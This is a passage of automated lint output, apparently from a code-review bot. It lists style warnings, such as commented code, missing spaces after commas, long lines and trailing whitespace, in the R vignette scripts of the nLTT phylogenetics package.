^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:61:41:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L61) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:65:42:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L65) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L68) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:54:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:68:129:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:54:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:72:102:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L77) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:82:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L82) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:86:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L86) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:89:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L89) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:93:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L93) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:95:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L95) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:97:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L97) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:100:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L100) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:104:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L104) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:105:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L105) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:108:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L108) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:109:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:112:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L112) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:116:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L116) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:41:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:120:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L120) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:42:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:123:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L123) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L124) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:54:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:124:129:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L128) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:54:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:128:102:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:131:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L131) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:140:53:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:143:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L143) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:147:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L147) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L148) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:54:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:148:129:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:54:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:152:102:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:154:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_get_nltt_values.R#L154) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:2:9:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_nltt_statistic.R:4:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L4) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:7:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L7) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 4---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:27:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L27) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 10--------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 